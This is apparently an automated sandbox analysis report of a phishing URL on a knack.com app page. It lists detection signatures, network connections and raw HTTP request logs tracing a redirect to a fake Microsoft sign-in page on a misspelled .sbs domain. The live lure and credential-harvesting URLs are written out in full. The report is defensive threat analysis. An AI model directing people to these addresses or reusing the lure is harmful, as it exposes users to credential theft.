Edit tour

Windows Analysis Report
https://mahoganydevelopment.knack.com/untitled-app

Overview

General Information

Sample URL:https://mahoganydevelopment.knack.com/untitled-app
Analysis ID:1650647
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected landing page (webpage, office document or email)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2004,i,1017552546778329204,10486880140214220164,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mahoganydevelopment.knack.com/untitled-app" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
1.8.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    1.9.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The URL 'mahoganydevelopment.secuefilett.sbs' does not match the legitimate domain for Microsoft., The URL contains suspicious elements such as 'secuefilett' which is a misspelling and unusual domain extension '.sbs'., The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft services. DOM: 1.8.pages.csv
      Source: Yara matchFile source: 1.8.pages.csv, type: HTML
      Source: Yara matchFile source: 1.9.pages.csv, type: HTML
      Source: https://mahoganydevelopment.knack.com/untitled-appJoe Sandbox AI: Page contains button: 'VIEW DOCUMENT' Source: '0.0.pages.csv'
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: Number of links: 0
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://mahoganydevelopment.knack.com/untitled-appHTTP Parser: Base64 decoded: {"version":3,"sources":["webpack://./components/AppHeader/pieces/DropdownMenu.vue","webpack://./DropdownMenu.vue"],"names":[],"mappings":"AACA;EACE,oBAAA;ACAF","sourcesContent":["\n.knHeader__menu-link-icon {\n display: inline-flex;\n}\n",".knHeader__men...
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: Title: Sign in to your account does not match URL
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: Invalid link: Privacy statement
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: Invalid link: Privacy statement
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: <input type="password" .../> found
      Source: https://mahoganydevelopment.knack.com/untitled-appHTTP Parser: No favicon
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: No favicon
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: No favicon
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: No favicon
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: No favicon
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: No favicon
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: No <meta name="author".. found
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: No <meta name="author".. found
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: No <meta name="copyright".. found
      Source: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/HTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
      Source: unknownHTTPS traffic detected: 35.169.97.179:443 -> 192.168.2.17:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.169.97.179:443 -> 192.168.2.17:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 68.70.205.2:443 -> 192.168.2.17:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.169.97.179:443 -> 192.168.2.17:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.17:49726 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 68.70.205.4:443 -> 192.168.2.17:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 18.205.131.89:443 -> 192.168.2.17:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.216.201.204:443 -> 192.168.2.17:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.169.97.179:443 -> 192.168.2.17:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.169.97.179:443 -> 192.168.2.17:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.17:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.17:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.17:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.92.58:443 -> 192.168.2.17:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.17:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.17:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.17:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.17:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.17:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.17:49772 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 119.28.146.206:443 -> 192.168.2.17:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 69.49.245.67:443 -> 192.168.2.17:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.62.10.46:443 -> 192.168.2.17:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.62.10.46:443 -> 192.168.2.17:49780 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 69.49.245.67:443 -> 192.168.2.17:49781 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.17:49782 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.17:49786 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 1MB later: 36MB
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
      Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
      Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
      Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
      Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
      Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
      Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
      Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
      Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
      Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
      Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
      Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
      Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /untitled-app HTTP/1.1Host: mahoganydevelopment.knack.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /namespace/scripts/k_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.js HTTP/1.1Host: cdn1.cloud-database.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /v1/applications/67e58d42813408027e860f5a?callback=jQuery18105310735734474465_1743108572608&_=1743108572940 HTTP/1.1Host: loader.knack.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mahoganydevelopment.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /renderer/css/jquery.fancybox-1.3.4.css HTTP/1.1Host: cdn1.cloud-database.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /renderer/css/v2/renderer_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.v2.min.css HTTP/1.1Host: cdn1.cloud-database.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /renderer/css/fonts.css HTTP/1.1Host: cdn1.cloud-database.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /renderer/css/v2/themes/theme-kn-beta_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.min.css HTTP/1.1Host: cdn1.cloud-database.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /67e58d42813408027e860f5a/custom/main.css?1743108573706 HTTP/1.1Host: appcdn.cloud-database.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /api/xdc.html?xdm_e=https%3A%2F%2Fmahoganydevelopment.knack.com&xdm_c=default4448&xdm_p=1 HTTP/1.1Host: us-east-1-renderer-write.knack.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mahoganydevelopment.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /api/xdc.html?xdm_e=https%3A%2F%2Fmahoganydevelopment.knack.com&xdm_c=default4447&xdm_p=1 HTTP/1.1Host: us-east-1-renderer-read.knack.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mahoganydevelopment.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/easyXDM/2.4.20/json2.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://us-east-1-renderer-read.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/1.7.2/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://us-east-1-renderer-read.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/underscore.js/1.3.3/underscore-min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://us-east-1-renderer-read.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/easyXDM/2.4.20/easyXDM.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://us-east-1-renderer-read.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /67e58d42813408027e860f5a/custom/main.js?1743108574483&_=1743108574484 HTTP/1.1Host: appcdn.cloud-database.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mahoganydevelopment.knack.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mahoganydevelopment.knack.com/untitled-appAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /manifest.json HTTP/1.1Host: mahoganydevelopment.knack.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://mahoganydevelopment.knack.com/untitled-appAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mahoganydevelopment.knack.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ZQbNk HTTP/1.1Host: mahoganydevelopment.secuefilett.sbsConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://mahoganydevelopment.knack.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ZQbNk/ HTTP/1.1Host: mahoganydevelopment.secuefilett.sbsConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.secuefilett.sbs/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.secuefilett.sbs/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.secuefilett.sbs/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
